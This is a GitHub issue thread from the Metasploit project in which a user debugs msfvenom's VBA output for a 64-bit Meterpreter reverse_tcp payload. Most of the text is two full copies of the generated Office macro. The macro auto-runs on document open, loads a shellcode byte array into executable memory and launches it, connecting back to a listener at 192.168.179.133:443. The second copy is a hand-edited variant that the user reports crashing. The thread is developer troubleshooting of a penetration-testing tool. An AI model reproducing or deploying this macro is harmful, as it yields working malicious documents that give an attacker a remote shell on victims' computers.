### ISSUE TITLE
msfvenom VBA/VBS 64 bit payload

### ISSUE THREAD

**Issue by vysec** [rapid7/metasploit-framework#6603]
Hi there,

TLDR: 
>**msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.179.133 LPORT=443 -f vba**
Above does not output 64 bit office compatible macro payload.

I have attempted to create VBA/VBS payloads for payload: windows/x64/meterpreter/reverse_tcp

As we may know, in office 2010+ we require the "PtrSafe" declaration when using "Declare" and in the generated payload for 64 bit meterpreter, there is no such declaration -> breaking the payload. I have attempted to use this by:

* Direct execution of vbs code
* Insert into a document macro -> debugger will run and find errors.

My questions are (not really questions):
* Do we need separate formats?

* If we are generating a 64 bit payload, we need to output the format in 64 bit compatible VB.
* If we are generating a 32 bit payload, we should need to output the format as 32 bit compatible VB.

* HOWEVER, what happens if I want to run 64 bit payloads on a 32 bit machine? This should not be possible so -> **NO NEED TO IMPLEMENT** as this will never be used.
* What if I want to run 32 bit payloads on a 64 bit machine? -> This won't work or at least I have not found a way to make use of the macro functionality from the output of vba.

REF: https://msdn.microsoft.com/en-us/library/office/ee691831(v=office.14).aspx

**Comment by vysec** [comment]
Not an issue. I just read the code, I do not know what happened earlier but non-safe functions were used and it would not load. Will give it another go and reopen if there's an issue.

**Comment by vysec** [comment]
Not sure if its outdated or not but i tried:

Copy VBA output to macro document.
Won't compile because of error "Too many line continuations"
So i fixed that and then I get "error with Xmcoc = VirtualAlloc(0, UBound(Dsmob), &H1000, &H40)" wrong type. So I fixed that and then it just crashes.

Wonder if anyone can give some insight? Thanks :)

**Comment by vysec** [comment]
So I ran:
`msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.179.133 LPORT=443 -f vba`

So I got the output:

`#If Vba7 Then
	Private Declare PtrSafe Function CreateThread Lib "kernel32" (ByVal Mhtodmufn As Long, ByVal Xucrkymvu As Long, ByVal Haqxvpmic As LongPtr, Lzrfbjf As Long, ByVal Axkdnyo As Long, Aruwedtyw As Long) As LongPtr
	Private Declare PtrSafe Function VirtualAlloc Lib "kernel32" (ByVal Wqc As Long, ByVal Aalflk As Long, ByVal Obaagshu As Long, ByVal Fgdssfi As Long) As LongPtr
	Private Declare PtrSafe Function RtlMoveMemory Lib "kernel32" (ByVal Zdcwgaumk As LongPtr, ByRef Nfvyt As Any, ByVal Xvoi As Long) As LongPtr
#Else
	Private Declare Function CreateThread Lib "kernel32" (ByVal Mhtodmufn As Long, ByVal Xucrkymvu As Long, ByVal Haqxvpmic As Long, Lzrfbjf As Long, ByVal Axkdnyo As Long, Aruwedtyw As Long) As Long
	Private Declare Function VirtualAlloc Lib "kernel32" (ByVal Wqc As Long, ByVal Aalflk As Long, ByVal Obaagshu As Long, ByVal Fgdssfi As Long) As Long
	Private Declare Function RtlMoveMemory Lib "kernel32" (ByVal Zdcwgaumk As Long, ByRef Nfvyt As Any, ByVal Xvoi As Long) As Long
#EndIf

Sub Auto_Open()
	Dim Xxbhpfla As Long, Dsmob As Variant, Kjmfxbbes As Long
#If Vba7 Then
	Dim  Xmcoc As LongPtr, Lwbq As LongPtr
#Else
	Dim  Xmcoc As Long, Lwbq As Long
#EndIf
	Dsmob = Array(72,131,228,240,232,204,0,0,0,65,81,65,80,82,81,86,72,49,210,101, _
72,139,82,96,72,139,82,24,72,139,82,32,72,139,114,80,72,15,183,74, _
74,77,49,201,72,49,192,172,60,97,124,2,44,32,65,193,201,13,65,1, _
193,226,237,82,65,81,72,139,82,32,139,66,60,72,1,208,102,129,120,24, _
11,2,15,133,114,0,0,0,139,128,136,0,0,0,72,133,192,116,103,72, _
1,208,80,139,72,24,68,139,64,32,73,1,208,227,86,72,255,201,65,139, _
52,136,72,1,214,77,49,201,72,49,192,172,65,193,201,13,65,1,193,56, _
224,117,241,76,3,76,36,8,69,57,209,117,216,88,68,139,64,36,73,1, _
208,102,65,139,12,72,68,139,64,28,73,1,208,65,139,4,136,72,1,208, _
65,88,65,88,94,89,90,65,88,65,89,65,90,72,131,236,32,65,82,255, _
224,88,65,89,90,72,139,18,233,75,255,255,255,93,73,190,119,115,50,95, _
51,50,0,0,65,86,73,137,230,72,129,236,160,1,0,0,73,137,229,73, _
188,2,0,1,187,192,168,179,133,65,84,73,137,228,76,137,241,65,186,76, _
119,38,7,255,213,76,137,234,104,1,1,0,0,89,65,186,41,128,107,0, _
255,213,106,5,65,94,80,80,77,49,201,77,49,192,72,255,192,72,137,194, _
72,255,192,72,137,193,65,186,234,15,223,224,255,213,72,137,199,106,16,65, _
88,76,137,226,72,137,249,65,186,153,165,116,97,255,213,133,192,116,10,73, _
255,206,117,229,232,147,0,0,0,72,131,236,16,72,137,226,77,49,201,106, _
4,65,88,72,137,249,65,186,2,217,200,95,255,213,131,248,0,126,85,72, _
131,196,32,94,137,246,106,64,65,89,104,0,16,0,0,65,88,72,137,242, _
72,49,201,65,186,88,164,83,229,255,213,72,137,195,73,137,199,77,49,201, _
73,137,240,72,137,218,72,137,249,65,186,2,217,200,95,255,213,131,248,0, _
125,40,88,65,87,89,104,0,64,0,0,65,88,106,0,90,65,186,11,47, _
15,48,255,213,87,89,65,186,117,110,77,97,255,213,73,255,206,233,60,255, _
255,255,72,1,195,72,41,198,72,133,246,117,180,65,255,231,88,106,0,89, _
73,199,194,240,181,162,86,255,213)

	Xmcoc = VirtualAlloc(0, UBound(Dsmob), &H1000, &H40)
	For Kjmfxbbes = LBound(Dsmob) To UBound(Dsmob)
		Xxbhpfla = Dsmob(Kjmfxbbes)
		Lwbq = RtlMoveMemory(Xmcoc + Kjmfxbbes, Xxbhpfla, 1)
	Next Kjmfxbbes
	Lwbq = CreateThread(0, 0, Xmcoc, 0, 0, 0)
End Sub
Sub AutoOpen()
	Auto_Open
End Sub
Sub Workbook_Open()
	Auto_Open
End Sub
`

Modified to:

`#If Vba7 Then
	Private Declare PtrSafe Function CreateThread Lib "kernel32" (ByVal Mhtodmufn As Long, ByVal Xucrkymvu As Long, ByVal Haqxvpmic As LongPtr, Lzrfbjf As Long, ByVal Axkdnyo As Long, Aruwedtyw As Long) As LongPtr
	Private Declare PtrSafe Function VirtualAlloc Lib "kernel32" (ByVal Wqc As Long, ByVal Aalflk As Long, ByVal Obaagshu As Long, ByVal Fgdssfi As Long) As LongPtr
	Private Declare PtrSafe Function RtlMoveMemory Lib "kernel32" (ByVal Zdcwgaumk As LongPtr, ByRef Nfvyt As Any, ByVal Xvoi As Long) As LongPtr
#Else
	Private Declare Function CreateThread Lib "kernel32" (ByVal Mhtodmufn As Long, ByVal Xucrkymvu As Long, ByVal Haqxvpmic As Long, Lzrfbjf As Long, ByVal Axkdnyo As Long, Aruwedtyw As Long) As Long
	Private Declare Function VirtualAlloc Lib "kernel32" (ByVal Wqc As Long, ByVal Aalflk As Long, ByVal Obaagshu As Long, ByVal Fgdssfi As Long) As Long
	Private Declare Function RtlMoveMemory Lib "kernel32" (ByVal Zdcwgaumk As Long, ByRef Nfvyt As Any, ByVal Xvoi As Long) As Long
#EndIf

Sub Auto_Open()
	Dim Xxbhpfla As Long, Dsmob As Variant, Kjmfxbbes As Long
#If Vba7 Then
	Dim  Xmcoc As LongPtr, Lwbq As LongPtr
#Else
	Dim  Xmcoc As Long, Lwbq As Long
#EndIf
	Dsmob = Array(72,131,228,240,232,204,0,0,0,65,81,65,80,82,81,86,72,49,210,101,72,139,82,96,72,139,82,24,72,139,82,32,72,139,114,80,72,15,183,74, _
74,77,49,201,72,49,192,172,60,97,124,2,44,32,65,193,201,13,65,1, _
193,226,237,82,65,81,72,139,82,32,139,66,60,72,1,208,102,129,120,24,11,2,15,133,114,0,0,0,139,128,136,0,0,0,72,133,192,116,103,72, _
1,208,80,139,72,24,68,139,64,32,73,1,208,227,86,72,255,201,65,139, _
52,136,72,1,214,77,49,201,72,49,192,172,65,193,201,13,65,1,193,56,224,117,241,76,3,76,36,8,69,57,209,117,216,88,68,139,64,36,73,1, _
208,102,65,139,12,72,68,139,64,28,73,1,208,65,139,4,136,72,1,208, _
65,88,65,88,94,89,90,65,88,65,89,65,90,72,131,236,32,65,82,255,224,88,65,89,90,72,139,18,233,75,255,255,255,93,73,190,119,115,50,95, _
51,50,0,0,65,86,73,137,230,72,129,236,160,1,0,0,73,137,229,73, _
188,2,0,1,187,192,168,179,133,65,84,73,137,228,76,137,241,65,186,76, _
119,38,7,255,213,76,137,234,104,1,1,0,0,89,65,186,41,128,107,0,55,213,106,5,65,94,80,80,77,49,201,77,49,192,72,255,192,72,137,194, _
72,255,192,72,137,193,65,186,234,15,223,224,255,213,72,137,199,106,16,65, _
88,76,137,226,72,137,249,65,186,153,165,116,97,255,213,133,192,116,10,73, _
255,206,117,229,232,147,0,0,0,72,131,236,16,72,137,226,77,49,201,106,4,65,88,72,137,249,65,186,2,217,200,95,255,213,131,248,0,126,85,72, _
131,196,32,94,137,246,106,64,65,89,104,0,16,0,0,65,88,72,137,242, _
72,49,201,65,186,88,164,83,229,255,213,72,137,195,73,137,199,77,49,201,73,137,240,72,137,218,72,137,249,65,186,2,217,200,95,255,213,131,248,0, _
125,40,88,65,87,89,104,0,64,0,0,65,88,106,0,90,65,186,11,47, _
15,48,255,213,87,89,65,186,117,110,77,97,255,213,73,255,206,233,60,255,255,255,72,1,195,72,41,198,72,133,246,117,180,65,255,231,88,106,0,89, _
73,199,194,240,181,162,86,255,213)

	Xmcoc = VirtualAlloc(0, UBound(Dsmob), &H1000, &H40)
	For Kjmfxbbes = LBound(Dsmob) To UBound(Dsmob)
		Xxbhpfla = Dsmob(Kjmfxbbes)
		Lwbq = RtlMoveMemory(Xmcoc + Kjmfxbbes, Xxbhpfla, 1)
	Next Kjmfxbbes
	Lwbq = CreateThread(0, 0, Xmcoc, 0, 0, 0)
End Sub
Sub AutoOpen()
	Auto_Open
End Sub
Sub Workbook_Open()
	Auto_Open
End Sub`

I modified the output as the original did not work. This however made an issue appear and my Word would crash instead of run the code. It staged once within a debugging / interpreter environment where I was pressing the "play" button but it would not work from launch.

**Comment by vysec** [comment]
Nevermind, got it working in the end, but needs a minor bug fix that I will submit later.

**Comment by void-in** [comment]
@vysec Did you by any chance using a non-US locale settings? I remember there was a problem with VBA working in such an environment. Anyway, your patch would definitely help. Thanks
